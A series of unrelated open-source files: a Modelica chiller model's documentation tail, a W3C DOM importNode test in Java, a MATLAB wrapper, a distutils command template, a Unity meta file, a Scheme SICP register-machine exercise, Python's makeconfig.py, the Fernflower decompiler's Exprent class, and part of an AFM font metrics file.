where <i>P<sub>0</sub></i> is the pump nominal power obtained from the performance data <code>per.P_nominal</code>.
The heat balance of the chiller is
<p align=\"center\" style=\"font-style:italic;\">
Q̇<sub>con</sub> = -Q̇<sub>eva</sub> + Q̇<sub>gen</sub> + P.
</p>
<h4>Performance data</h4>
<p>
The equipment performance data is obtained from the record <code>per</code>,
which is an instance of
<a href=\"Buildings.Fluid.Chillers.Data.AbsorptionIndirectSteam\">
Buildings.Fluid.Chillers.Data.AbsorptionIndirectSteam</a>.
Additional performance curves can be developed using
two available techniques (Hydeman and Gillespie, 2002). The first technique is called the
Least-squares Linear Regression method and is used when sufficient performance data exist
to employ standard least-square linear regression techniques. The second technique is called
Reference Curve Method and is used when insufficient performance data exist to apply linear
regression techniques. A detailed description of both techniques can be found in
Hydeman and Gillespie (2002).
</p>
<h4>References</h4>
<ul>
<li>
Hydeman, M. and K.L. Gillespie. 2002. Tools and Techniques to Calibrate Electric Chiller
Component Models. <i>ASHRAE Transactions</i>, AC-02-9-1.
</li>
</ul>
</html>", revisions="<html>
<ul>
<li>
November 26, 2019, by Michael Wetter:<br/>
Revised implementation and documentation.
</li>
<li>
July 3, 2019, by Hagar Elarga:<br/>
First implementation.
</li>
</ul>
</html>"));
end AbsorptionIndirectSteam;
| {
"pile_set_name": "Github"
} |
/*
This Java source file was generated by test-to-java.xsl
and is a derived work from the source document.
The source document contained the following notice:
Copyright (c) 2001 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
*/
package org.w3c.domts.level2.core;
import org.w3c.dom.*;
import org.w3c.domts.DOMTestCase;
import org.w3c.domts.DOMTestDocumentBuilderFactory;
/**
 * The "importNode(importedNode,deep)" method for a
 * Document should import the given importedNode into that Document.
 * Here the importedNode is of type Document_Fragment.
 *
 * Create a DocumentFragment in a second, separately loaded document.
 * Invoke method importNode(importedNode,deep) on the first document
 * with importedNode being the newly created DocumentFragment.
 * Method should return an empty DocumentFragment that belongs
 * to the importing document, whose doctype systemId is "staffNS.dtd"
 * (matching the assertion below).
 * @author NIST
 * @author Mary Brady
 * @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode">http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode</a>
 * @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#ID-Core-DocType-systemId">http://www.w3.org/TR/DOM-Level-2-Core/core#ID-Core-DocType-systemId</a>
 */
public final class importNode08 extends DOMTestCase {

  /**
   * Constructor.
   * @param factory document factory, may not be null
   * @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration
   */
  public importNode08(final DOMTestDocumentBuilderFactory factory) throws org.w3c.domts.DOMTestIncompatibleException {
    super(factory);
    //
    // Two documents are loaded from the same "staffNS" fixture in
    // runTest(), so preload once per load.
    //
    String contentType = getContentType();
    preload(contentType, "staffNS", true);
    preload(contentType, "staffNS", true);
  }

  /**
   * Runs the test case.
   * @throws Throwable Any uncaught exception causes test to fail
   */
  public void runTest() throws Throwable {
    // The importing document and a second, independent source document.
    Document targetDoc = (Document) load("staffNS", true);
    Document sourceDoc = (Document) load("staffNS", true);

    // Import an empty fragment created in the source document.
    DocumentFragment fragment = sourceDoc.createDocumentFragment();
    Node imported = targetDoc.importNode(fragment, false);

    // The imported fragment must be empty...
    boolean hasChild = imported.hasChildNodes();
    assertFalse("hasChild", hasChild);

    // ...and owned by the importing document, whose doctype systemId
    // ends with "staffNS.dtd".
    Document owner = imported.getOwnerDocument();
    DocumentType doctype = owner.getDoctype();
    String system = doctype.getSystemId();
    assertURIEquals("system", null, null, null, "staffNS.dtd", null, null, null, null, system);
  }

  /**
   * Gets URI that identifies the test.
   * @return uri identifier of test
   */
  public String getTargetURI() {
    return "http://www.w3.org/2001/DOM-Test-Suite/level2/core/importNode08";
  }

  /**
   * Runs this test from the command line.
   * @param args command line arguments
   */
  public static void main(final String[] args) {
    DOMTestCase.doMain(importNode08.class, args);
  }
}
| {
"pile_set_name": "Github"
} |
function varargout = override(varargin)
% VL_OVERRIDE Override structure subset
% CONFIG = VL_OVERRIDE(CONFIG, UPDATE) copies recursively the fields
% of the structure UPDATE to the corresponding fields of the
% structure CONFIG.
%
% Usually CONFIG is interpreted as a list of parameters with their
% default values and UPDATE as a list of new parameter values.
%
% VL_OVERRIDE(..., 'Warn') prints a warning message whenever: (i)
% UPDATE has a field not found in CONFIG, or (ii) non-leaf values of
% CONFIG are overwritten.
%
% VL_OVERRIDE(..., 'Skip') skips fields of UPDATE that are not found
% in CONFIG instead of copying them.
%
% VL_OVERRIDE(..., 'CaseI') matches field names in a
% case-insensitive manner.
%
% Remark::
% Fields are copied at the deepest possible level. For instance,
% if CONFIG has fields A.B.C1=1 and A.B.C2=2, and if UPDATE is the
% structure A.B.C1=3, then VL_OVERRIDE() returns a structure with
% fields A.B.C1=3, A.B.C2=2. By contrast, if UPDATE is the
% structure A.B=4, then the field A.B is copied, and VL_OVERRIDE()
% returns the structure A.B=4 (specifying 'Warn' would warn about
% the fact that the substructure B.C1, B.C2 is being deleted).
%
% Remark::
% Two fields are matched if they correspond exactly. Specifically,
% two fields A(IA).FA and B(IB).FB of two struct arrays A and B
% match if, and only if, (i) A and B have the same dimensions,
% (ii) IA == IB, and (iii) FA == FB.
%
% See also: VL_ARGPARSE(), VL_HELP().

% This file is a thin compatibility wrapper: all arguments and return
% values are forwarded unchanged to VL_OVERRIDE().
[varargout{1:nargout}] = vl_override(varargin{:});
| {
"pile_set_name": "Github"
} |
"""distutils.command.x
Implements the Distutils 'x' command.
"""
# created 2000/mm/dd, John Doe
__revision__ = "$Id$"
from distutils.core import Command
class x(Command):
# Brief (40-50 characters) description of the command
description = ""
# List of option tuples: long name, short name (None if no short
# name), and help string.
user_options = [('', '',
""),
]
def initialize_options(self):
self. = None
self. = None
self. = None
def finalize_options(self):
if self.x is None:
self.x =
def run(self):
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: eec785c5f1463f746a6ded89f150f845
timeCreated: 1501397127
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
; SICP exercise 5.12
;
; The simulator can be used to help determine the data paths required for
; implementing a machine with a given controller. Extend the assembler to
; store the following information in the machine model:
;
; * a list of all instructions, with duplicates removed, sorted by instruction
; type (assign, goto, and so on);
; * a list (without duplicates) of the registers used to hold entry points
; (these are the registers referenced by goto instructions);
; * a list (without duplicates) of the registers that are saved or restored;
; * for each register, a list (without duplicates) of the sources from which
; it is assigned (for example, the sources for register val in the factorial
; of figure 5.11 are (const 1) and ((op *) (reg n) (reg val))).
;
; Extend the message-passing interface to the machine to provide access to
; this new information. To test your analyzer, define the Fibonacci machine
; from figure 5.12 and examine the lists you constructed.
; Collects the four data-path summaries for a controller text into an
; association list keyed by summary name: instructions,
; entry-point-registers, stack-registers and register-sources.
(define (extract-data-path-info controller-text)
  `((instructions ,(data-path-instructions controller-text))
    (entry-point-registers ,(data-path-entry-point-registers controller-text))
    (stack-registers ,(data-path-stack-registers controller-text))
    (register-sources ,(data-path-register-sources controller-text))))
; All distinct instructions in the controller text, reported verbatim
; and sorted (see process-text).  Every instruction passes the filter.
(define (data-path-instructions controller-text)
  (process-text controller-text
                (lambda (instruction) #true)
                (lambda (instruction) instruction)))
; Registers used to hold entry points: the <name> of every
; (goto (reg <name>)) instruction, without duplicates.
(define (data-path-entry-point-registers controller-text)
  (process-text controller-text
                (lambda (inst) (and (eq? (car inst) 'goto)
                                    (register-exp? (goto-dest inst))))
                ;; Extract the goto's destination expression first, then
                ;; that expression's register name.  The original used
                ;; (compose goto-dest register-exp-reg), which -- since
                ;; compose applies right-to-left -- ran the selectors in
                ;; the reverse of the intended order; it presumably only
                ;; worked because both selectors happen to take the cadr.
                (lambda (inst) (register-exp-reg (goto-dest inst)))))
; Registers that are saved or restored on the stack, without duplicates.
(define (data-path-stack-registers controller-text)
  (process-text controller-text
                ;; memq yields a truthy tail for save/restore, which is
                ;; all the filter in process-text needs.
                (lambda (inst) (memq (car inst) '(save restore)))
                stack-inst-reg-name))
;; For each register, the distinct sources it is assigned from, as an
;; alist of (register-name source ...).  A source is the full value
;; expression for operation assignments (e.g. ((op *) (reg n) (reg val)))
;; or the single primitive expression (e.g. (const 1)) otherwise.
(define (data-path-register-sources controller-text)
  ;; Folds a list of (register source) pairs into alist entries,
  ;; merging *consecutive* pairs that share a register name.  This
  ;; relies on process-text sorting its output, so pairs with equal
  ;; registers are adjacent.
  ;; NOTE(review): with no assign instructions at all this returns
  ;; (()) rather than () -- confirm callers tolerate that.
  (define (to-alist items result)
    (cond ((null? items) (list result))
          ((null? result)
           (to-alist (cdr items) (car items)))
          ((eq? (caar items) (car result))
           (to-alist (cdr items) (cons (car result)
                                       (append (cdr result)
                                               (list (cadar items))))))
          (else (cons result (to-alist items '())))))
  (to-alist
   (process-text controller-text
                 (lambda (inst) (eq? (car inst) 'assign))
                 (lambda (inst) (list (assign-reg-name inst)
                                      ;; Operation expressions are kept whole;
                                      ;; otherwise the value exp is a one-element
                                      ;; list whose car is the source.
                                      (if (operation-exp? (assign-value-exp inst))
                                          (assign-value-exp inst)
                                          (car (assign-value-exp inst))))))
   '()))
;; Shared pipeline for the data-path-* extractors: keep only the pair
;; entries of the controller text (dropping non-pair entries such as
;; labels), select those matching predicate, map proc over them, remove
;; duplicates, and sort by printed representation for a stable order.
(define (process-text controller-text predicate proc)
  (let* ((instruction-forms (filter pair? controller-text))
         (selected (filter predicate instruction-forms))
         (results (remove-duplicates (map proc selected))))
    (sort results
          string<?
          #:key (lambda (item) (format "~a" item))
          #:cache-keys? #f)))
; Tweaks for make-machine and make-new-machine:
; Builds a register machine: allocates the named registers, installs
; the operations and the assembled instruction sequence, and -- the
; extension for this exercise -- stores the data-path summary derived
; from the controller text.
(define (make-machine register-names ops controller-text)
  (let ((machine (make-new-machine)))
    (for-each (lambda (name) ((machine 'allocate-register) name))
              register-names)
    ((machine 'install-operations) ops)
    ((machine 'install-instruction-sequence) (assemble controller-text machine))
    ((machine 'install-data-path-info) (extract-data-path-info controller-text))
    machine))
;; Constructs the basic machine object: a message-passing closure over
;; the pc/flag registers, the stack, the register table, the installed
;; operations, and (exercise extension) the data-path summary installed
;; by make-machine via 'install-data-path-info.
(define (make-new-machine)
  (let ((pc (make-register 'pc))
        (flag (make-register 'flag))
        (stack (make-stack))
        (the-instruction-sequence '())
        (data-path-info '()))    ; filled in by 'install-data-path-info
    (let ((the-ops (list (list 'initialize-stack
                               (lambda () (stack 'initialize)))))
          (register-table (list (list 'pc pc) (list 'flag flag))))
      ;; Adds a fresh register under NAME; duplicate names are an error.
      (define (allocate-register name)
        (if (assoc name register-table)
            (error "Multiply defined register: " name)
            (set! register-table (cons (list name (make-register name))
                                       register-table)))
        'register-allocated)
      ;; Returns the register object registered under NAME, or errors.
      (define (lookup-register name)
        (let ((val (assoc name register-table)))
          (if val
              (cadr val)
              (error "Unknown register: " name))))
      ;; Fetch-execute loop: run the instruction pc points at until the
      ;; remaining instruction list is empty.
      (define (execute)
        (let ((insts (get-contents pc)))
          (if (null? insts)
              'done
              (begin
                ((instruction-execution-proc (car insts)))
                (execute)))))
      ;; Message dispatcher.  The data-path-* messages expose the four
      ;; summaries stored in data-path-info.
      (define (dispatch message)
        (cond ((eq? message 'start)
               (set-contents! pc the-instruction-sequence)
               (execute))
              ((eq? message 'install-instruction-sequence)
               (lambda (seq) (set! the-instruction-sequence seq)))
              ((eq? message 'allocate-register) allocate-register)
              ((eq? message 'get-register) lookup-register)
              ((eq? message 'install-operations)
               (lambda (ops) (set! the-ops (append the-ops ops))))
              ((eq? message 'stack) stack)
              ((eq? message 'operations) the-ops)
              ((eq? message 'install-data-path-info)
               (lambda (info) (set! data-path-info info)))
              ((eq? message 'data-path-instructions)
               (cadr (assoc 'instructions data-path-info)))
              ((eq? message 'data-path-entry-point-registers)
               (cadr (assoc 'entry-point-registers data-path-info)))
              ((eq? message 'data-path-stack-registers)
               (cadr (assoc 'stack-registers data-path-info)))
              ((eq? message 'data-path-register-sources)
               (cadr (assoc 'register-sources data-path-info)))
              (else (error "Unknown request -- MACHINE" message))))
      dispatch)))
| {
"pile_set_name": "Github"
} |
{
"id": "overlay_male_worn_scarf",
"fg": ["scarf_m"],
"bg": []
}
| {
"pile_set_name": "Github"
} |
import re
import sys
# Write the config.c file

# Module names that never get generated init entries: they are built
# into the interpreter core rather than linked in as extension modules.
never = ['marshal', '__main__', '__builtin__', 'sys', 'exceptions', '_warnings']

def makeconfig(infp, outfp, modules, with_ifdef=0):
    """Copy the config.c template from infp to outfp, expanding markers.

    Each marker line is copied through, then immediately followed by
    generated text for every module in `modules` (skipping `never`):

    - "-- ADDMODULE MARKER 1 --": extern declarations for init<mod>,
      wrapped in #ifndef/#endif when `with_ifdef` is true.
    - "-- ADDMODULE MARKER 2 --": inittab entries {"<mod>", init<mod>}.

    Only the first occurrence of each marker is expanded.  A warning is
    written to sys.stderr if a marker is never seen.
    """
    m1 = re.compile('-- ADDMODULE MARKER 1 --')
    m2 = re.compile('-- ADDMODULE MARKER 2 --')
    # Iterate the file directly instead of the while-1/readline() loop.
    for line in infp:
        outfp.write(line)
        if m1 and m1.search(line):
            m1 = None  # expand only the first occurrence
            for mod in modules:
                if mod in never:
                    continue
                if with_ifdef:
                    outfp.write("#ifndef init%s\n" % mod)
                outfp.write('extern void init%s(void);\n' % mod)
                if with_ifdef:
                    outfp.write("#endif\n")
        elif m2 and m2.search(line):
            m2 = None  # expand only the first occurrence
            for mod in modules:
                if mod in never:
                    continue
                outfp.write('\t{"%s", init%s},\n' %
                            (mod, mod))
    # NOTE(review): if marker 1 is missing, a missing marker 2 is not
    # reported as well (elif) -- preserved from the original behavior.
    if m1:
        sys.stderr.write('MARKER 1 never found\n')
    elif m2:
        sys.stderr.write('MARKER 2 never found\n')
# Test program.

def test():
    """Command-line driver: makeconfig.py <config.c.in|-> <output|-> mod...

    "-" selects stdin / stdout respectively.  Exits with status 2 when
    fewer than three arguments are given.  (Python 2 syntax: uses print
    statements.)
    """
    if not sys.argv[3:]:
        print 'usage: python makeconfig.py config.c.in outputfile',
        print 'modulename ...'
        sys.exit(2)
    if sys.argv[1] == '-':
        infp = sys.stdin
    else:
        infp = open(sys.argv[1])
    if sys.argv[2] == '-':
        outfp = sys.stdout
    else:
        outfp = open(sys.argv[2], 'w')
    makeconfig(infp, outfp, sys.argv[3:])
    # Only close streams this function opened itself; never close the
    # process's stdin/stdout.
    if outfp != sys.stdout:
        outfp.close()
    if infp != sys.stdin:
        infp.close()

if __name__ == '__main__':
    test()
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2000-2016 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jetbrains.java.decompiler.modules.decompiler.exps;
import org.jetbrains.java.decompiler.main.DecompilerContext;
import org.jetbrains.java.decompiler.main.TextBuffer;
import org.jetbrains.java.decompiler.main.collectors.BytecodeMappingTracer;
import org.jetbrains.java.decompiler.main.collectors.CounterContainer;
import org.jetbrains.java.decompiler.modules.decompiler.vars.CheckTypesResult;
import org.jetbrains.java.decompiler.modules.decompiler.vars.VarVersionPair;
import org.jetbrains.java.decompiler.struct.gen.VarType;
import org.jetbrains.java.decompiler.struct.match.IMatchable;
import org.jetbrains.java.decompiler.struct.match.MatchEngine;
import org.jetbrains.java.decompiler.struct.match.MatchNode;
import org.jetbrains.java.decompiler.struct.match.MatchNode.RuleValue;
import java.util.*;
import java.util.Map.Entry;
/**
 * Base class for all expression nodes produced by the decompiler.
 * The concrete kind of an instance is identified by the EXPRENT_*
 * constant stored in {@link #type}; every instance receives a unique
 * {@link #id} from the shared expression counter.  Subclasses override
 * the "not implemented" methods below.  Also participates in the
 * pattern-matching framework via {@link IMatchable}.
 */
public class Exprent implements IMatchable {

  // Bit flags returned by getExprentUse(); BOTH_FLAGS is their union.
  public static final int MULTIPLE_USES = 1;
  public static final int SIDE_EFFECTS_FREE = 2;
  public static final int BOTH_FLAGS = 3;

  // Discriminator values for the 'type' field, one per expression kind.
  public static final int EXPRENT_ARRAY = 1;
  public static final int EXPRENT_ASSIGNMENT = 2;
  public static final int EXPRENT_CONST = 3;
  public static final int EXPRENT_EXIT = 4;
  public static final int EXPRENT_FIELD = 5;
  public static final int EXPRENT_FUNCTION = 6;
  public static final int EXPRENT_IF = 7;
  public static final int EXPRENT_INVOCATION = 8;
  public static final int EXPRENT_MONITOR = 9;
  public static final int EXPRENT_NEW = 10;
  public static final int EXPRENT_SWITCH = 11;
  public static final int EXPRENT_VAR = 12;
  public static final int EXPRENT_ANNOTATION = 13;
  public static final int EXPRENT_ASSERT = 14;

  // Kind of this expression: one of the EXPRENT_* constants above.
  public final int type;
  // Unique id, drawn from CounterContainer.EXPRENT_COUNTER.
  public final int id;
  public Set<Integer> bytecode = null;  // offsets of bytecode instructions decompiled to this exprent

  public Exprent(int type) {
    this.type = type;
    this.id = DecompilerContext.getCounterContainer().getCounterAndIncrement(CounterContainer.EXPRENT_COUNTER);
  }

  /** Operator precedence for rendering; subclasses override. */
  public int getPrecedence() {
    return 0; // the highest precedence
  }

  /** Static type of this expression; subclasses override (void here). */
  public VarType getExprType() {
    return VarType.VARTYPE_VOID;
  }

  /**
   * Usage flags for this expression -- presumably a mask of
   * MULTIPLE_USES / SIDE_EFFECTS_FREE as the constants suggest;
   * subclasses override (no flags here).
   */
  public int getExprentUse() {
    return 0;
  }

  /** Type-bound constraints for inference; subclasses override (empty here). */
  public CheckTypesResult checkExprTypeBounds() {
    return new CheckTypesResult();
  }

  /**
   * Returns true if this exprent, or any exprent nested inside it
   * (recursively), equals the given exprent.
   */
  public boolean containsExprent(Exprent exprent) {
    List<Exprent> listTemp = new ArrayList<Exprent>(getAllExprents(true));
    listTemp.add(this);
    for (Exprent lstExpr : listTemp) {
      if (lstExpr.equals(exprent)) {
        return true;
      }
    }
    return false;
  }

  /**
   * Direct child exprents, optionally expanded recursively.  The
   * recursive expansion appends each child's (already fully expanded)
   * subtree, iterating indices downward so appended entries are not
   * re-visited.
   */
  public List<Exprent> getAllExprents(boolean recursive) {
    List<Exprent> lst = getAllExprents();
    if (recursive) {
      for (int i = lst.size() - 1; i >= 0; i--) {
        lst.addAll(lst.get(i).getAllExprents(true));
      }
    }
    return lst;
  }

  /**
   * Collects the (variable, version) pairs of every EXPRENT_VAR found
   * in this exprent or any nested exprent, including this one.
   */
  public Set<VarVersionPair> getAllVariables() {
    List<Exprent> lstAllExprents = getAllExprents(true);
    lstAllExprents.add(this);

    Set<VarVersionPair> set = new HashSet<VarVersionPair>();
    for (Exprent expr : lstAllExprents) {
      if (expr.type == EXPRENT_VAR) {
        set.add(new VarVersionPair((VarExprent)expr));
      }
    }
    return set;
  }

  /** Direct child exprents; must be implemented by each subclass. */
  public List<Exprent> getAllExprents() {
    throw new RuntimeException("not implemented");
  }

  /** Deep copy; must be implemented by each subclass. */
  public Exprent copy() {
    throw new RuntimeException("not implemented");
  }

  /** Renders this exprent as Java source; must be implemented by each subclass. */
  public TextBuffer toJava(int indent, BytecodeMappingTracer tracer) {
    throw new RuntimeException("not implemented");
  }

  /** Replaces a direct child; no-op here, overridden by subclasses with children. */
  public void replaceExprent(Exprent oldExpr, Exprent newExpr) { }

  /**
   * Records additional originating bytecode offsets for this exprent,
   * lazily creating the set.  Null or empty input is ignored.
   */
  public void addBytecodeOffsets(Collection<Integer> bytecodeOffsets) {
    if (bytecodeOffsets != null && !bytecodeOffsets.isEmpty()) {
      if (bytecode == null) {
        bytecode = new HashSet<Integer>(bytecodeOffsets);
      }
      else {
        bytecode.addAll(bytecodeOffsets);
      }
    }
  }

  // *****************************************************************************
  // IMatchable implementation
  // *****************************************************************************

  /**
   * Resolves a child exprent for the match engine: by the node's
   * EXPRENT_POSITION rule when it is an integer (negative values count
   * from the end), otherwise by the given index.  Returns null when the
   * node is not an exprent node or no child applies.
   */
  public IMatchable findObject(MatchNode matchNode, int index) {
    if (matchNode.getType() != MatchNode.MATCHNODE_EXPRENT) {
      return null;
    }

    List<Exprent> lstAllExprents = getAllExprents();
    if (lstAllExprents == null || lstAllExprents.isEmpty()) {
      return null;
    }

    String position = (String)matchNode.getRuleValue(MatchProperties.EXPRENT_POSITION);
    if (position != null) {
      if (position.matches("-?\\d+")) {
        return lstAllExprents
          .get((lstAllExprents.size() + Integer.parseInt(position)) % lstAllExprents.size()); // care for negative positions
      }
    }
    else if (index < lstAllExprents.size()) { // use 'index' parameter
      return lstAllExprents.get(index);
    }

    return null;
  }

  /**
   * Checks this exprent against a match node: the EXPRENT_TYPE rule
   * must equal {@link #type}, and an EXPRENT_RET rule binds this
   * exprent to a match-engine variable (failing on conflict).
   */
  public boolean match(MatchNode matchNode, MatchEngine engine) {
    if (matchNode.getType() != MatchNode.MATCHNODE_EXPRENT) {
      return false;
    }

    for (Entry<MatchProperties, RuleValue> rule : matchNode.getRules().entrySet()) {
      MatchProperties key = rule.getKey();
      if (key == MatchProperties.EXPRENT_TYPE && this.type != ((Integer)rule.getValue().value).intValue()) {
        return false;
      }
      if (key == MatchProperties.EXPRENT_RET && !engine.checkAndSetVariableValue((String)rule.getValue().value, this)) {
        return false;
      }
    }

    return true;
  }

  /** Debug rendering: the generated Java source for this exprent. */
  public String toString() {
    return toJava(0, BytecodeMappingTracer.DUMMY).toString();
  }
}
"pile_set_name": "Github"
} |
StartFontMetrics 2.0
Comment Copyright (c) 1985, 1987, 1989, 1991 Adobe Systems Incorporated. All Rights Reserved.
Comment Creation Date: Tue May 28 16:56:07 1991
Comment UniqueID 35034
Comment VMusage 31030 37922
FontName NewCenturySchlbk-BoldItalic
FullName New Century Schoolbook Bold Italic
FamilyName New Century Schoolbook
Weight Bold
ItalicAngle -16
IsFixedPitch false
FontBBox -205 -250 1147 991
UnderlinePosition -100
UnderlineThickness 50
Version 001.007
Notice Copyright (c) 1985, 1987, 1989, 1991 Adobe Systems Incorporated. All Rights Reserved.
EncodingScheme AdobeStandardEncoding
CapHeight 722
XHeight 477
Ascender 737
Descender -205
StartCharMetrics 228
C 32 ; WX 287 ; N space ; B 0 0 0 0 ;
C 33 ; WX 333 ; N exclam ; B 0 -15 333 737 ;
C 34 ; WX 400 ; N quotedbl ; B 66 388 428 737 ;
C 35 ; WX 574 ; N numbersign ; B 30 0 544 690 ;
C 36 ; WX 574 ; N dollar ; B 9 -120 565 810 ;
C 37 ; WX 889 ; N percent ; B 54 -28 835 727 ;
C 38 ; WX 889 ; N ampersand ; B 32 -15 823 737 ;
C 39 ; WX 259 ; N quoteright ; B 48 388 275 737 ;
C 40 ; WX 407 ; N parenleft ; B 72 -117 454 745 ;
C 41 ; WX 407 ; N parenright ; B -70 -117 310 745 ;
C 42 ; WX 500 ; N asterisk ; B 58 301 498 737 ;
C 43 ; WX 606 ; N plus ; B 50 0 556 506 ;
C 44 ; WX 287 ; N comma ; B -57 -192 170 157 ;
C 45 ; WX 333 ; N hyphen ; B 2 177 263 299 ;
C 46 ; WX 287 ; N period ; B -20 -15 152 157 ;
C 47 ; WX 278 ; N slash ; B -41 -15 320 737 ;
C 48 ; WX 574 ; N zero ; B 21 -15 553 705 ;
C 49 ; WX 574 ; N one ; B 25 0 489 705 ;
C 50 ; WX 574 ; N two ; B -38 -3 538 705 ;
C 51 ; WX 574 ; N three ; B -7 -15 536 705 ;
C 52 ; WX 574 ; N four ; B -13 0 544 705 ;
C 53 ; WX 574 ; N five ; B 0 -15 574 705 ;
C 54 ; WX 574 ; N six ; B 31 -15 574 705 ;
C 55 ; WX 574 ; N seven ; B 64 -15 593 705 ;
C 56 ; WX 574 ; N eight ; B 0 -15 552 705 ;
C 57 ; WX 574 ; N nine ; B 0 -15 543 705 ;
C 58 ; WX 287 ; N colon ; B -20 -15 237 477 ;
C 59 ; WX 287 ; N semicolon ; B -57 -192 237 477 ;
C 60 ; WX 606 ; N less ; B 50 -9 556 515 ;
C 61 ; WX 606 ; N equal ; B 50 103 556 403 ;
C 62 ; WX 606 ; N greater ; B 50 -8 556 514 ;
C 63 ; WX 481 ; N question ; B 79 -15 451 737 ;
C 64 ; WX 747 ; N at ; B -4 -15 751 737 ;
C 65 ; WX 741 ; N A ; B -75 0 716 737 ;
C 66 ; WX 759 ; N B ; B -50 0 721 722 ;
C 67 ; WX 759 ; N C ; B 37 -15 759 737 ;
C 68 ; WX 833 ; N D ; B -47 0 796 722 ;
C 69 ; WX 741 ; N E ; B -41 0 730 722 ;
C 70 ; WX 704 ; N F ; B -41 0 730 722 ;
C 71 ; WX 815 ; N G ; B 37 -15 805 737 ;
C 72 ; WX 870 ; N H ; B -41 0 911 722 ;
C 73 ; WX 444 ; N I ; B -41 0 485 722 ;
C 74 ; WX 667 ; N J ; B -20 -15 708 722 ;
C 75 ; WX 778 ; N K ; B -41 0 832 722 ;
C 76 ; WX 704 ; N L ; B -41 0 670 722 ;
C 77 ; WX 944 ; N M ; B -44 0 988 722 ;
C 78 ; WX 852 ; N N ; B -61 -10 913 722 ;
C 79 ; WX 833 ; N O ; B 37 -15 796 737 ;
C 80 ; WX 741 ; N P ; B -41 0 730 722 ;
C 81 ; WX 833 ; N Q ; B 37 -189 796 737 ;
C 82 ; WX 796 ; N R ; B -41 -15 749 722 ;
C 83 ; WX 685 ; N S ; B 1 -15 666 737 ;
C 84 ; WX 722 ; N T ; B 41 0 759 722 ;
C 85 ; WX 833 ; N U ; B 88 -15 900 722 ;
C 86 ; WX 741 ; N V ; B 32 -10 802 722 ;
C 87 ; WX 944 ; N W ; B 40 -10 1000 722 ;
C 88 ; WX 741 ; N X ; B -82 0 801 722 ;
C 89 ; WX 704 ; N Y ; B 13 0 775 722 ;
C 90 ; WX 704 ; N Z ; B -33 0 711 722 ;
C 91 ; WX 407 ; N bracketleft ; B 1 -109 464 737 ;
C 92 ; WX 606 ; N backslash ; B 161 -15 445 737 ;
C 93 ; WX 407 ; N bracketright ; B -101 -109 362 737 ;
C 94 ; WX 606 ; N asciicircum ; B 66 325 540 690 ;
C 95 ; WX 500 ; N underscore ; B 0 -125 500 -75 ;
C 96 ; WX 259 ; N quoteleft ; B 47 388 274 737 ;
C 97 ; WX 667 ; N a ; B 6 -15 636 477 ;
C 98 ; WX 611 ; N b ; B 29 -15 557 737 ;
C 99 ; WX 537 ; N c ; B 0 -15 482 477 ;
C 100 ; WX 667 ; N d ; B 0 -15 660 737 ;
C 101 ; WX 519 ; N e ; B 0 -15 479 477 ;
C 102 ; WX 389 ; N f ; B -48 -205 550 737 ; L i fi ; L l fl ;
C 103 ; WX 611 ; N g ; B -63 -205 604 528 ;
C 104 ; WX 685 ; N h ; B 0 -15 639 737 ;
C 105 ; WX 389 ; N i ; B 32 -15 345 737 ;
C 106 ; WX 370 ; N j ; B -205 -205 347 737 ;
C 107 ; WX 648 ; N k ; B -11 -15 578 737 ;
C 108 ; WX 389 ; N l ; B 32 -15 375 737 ;
C 109 ; WX 944 ; N m ; B 0 -15 909 477 ;
C 110 ; WX 685 ; N n ; B 0 -15 639 477 ;
C 111 ; WX 574 ; N o ; B 0 -15 530 477 ;
C 112 ; WX 648 ; N p ; B -119 -205 590 477 ;
C 113 ; WX 630 ; N q ; B 0 -205 587 477 ;
C 114 ; WX 519 ; N r ; B 0 0 527 486 ;
C 115 ; WX 481 ; N s ; B 0 -15 435 477 ;
C 116 ; WX 407 ; N t ; B 24 -15 403 650 ;
C 117 ; WX 685 ; N u ; B 30 -15 635 477 ;
C 118 ; WX 556 ; N v ; B 30 -15 496 477 ;
C 119 ; WX 833 ; N w ; B 30 -15 773 477 ;
C 120 ; WX 574 ; N x ; B -46 -15 574 477 ;
C 121 ; WX 519 ; N y ; B -66 -205 493 477 ;
C 122 ; WX 519 ; N z ; B -19 -15 473 477 ;
C 123 ; WX 407 ; N braceleft ; B 52 -109 408 737 ;
C 124 ; WX 606 ; N bar ; B 249 -250 357 750 ;
C 125 ; WX 407 ; N braceright ; B -25 -109 331 737 ;
C 126 ; WX 606 ; N asciitilde ; B 72 160 534 346 ;
C 161 ; WX 333 ; N exclamdown ; B -44 -205 289 547 ;
C 162 ; WX 574 ; N cent ; B 30 -144 512 578 ;
C 163 ; WX 574 ; N sterling ; B -18 -15 566 705 ;
C 164 ; WX 167 ; N fraction ; B -166 -15 333 705 ;
C 165 ; WX 574 ; N yen ; B 17 0 629 690 ;
C 166 ; WX 574 ; N florin ; B -43 -205 575 737 ;
C 167 ; WX 500 ; N section ; B -30 -146 515 737 ;
C 168 ; WX 574 ; N currency ; B 27 84 547 605 ;
C 169 ; WX 287 ; N quotesingle ; B 112 388 250 737 ;
C 170 ; WX 481 ; N quotedblleft ; B 54 388 521 737 ;
C 171 ; WX 481 ; N guillemotleft ; B -35 69 449 407 ;
C 172 ; WX 278 ; N guilsinglleft ; B -25 69 244 407 ;
C 173 ; WX 278 ; N guilsinglright ; B -26 69 243 407 ;
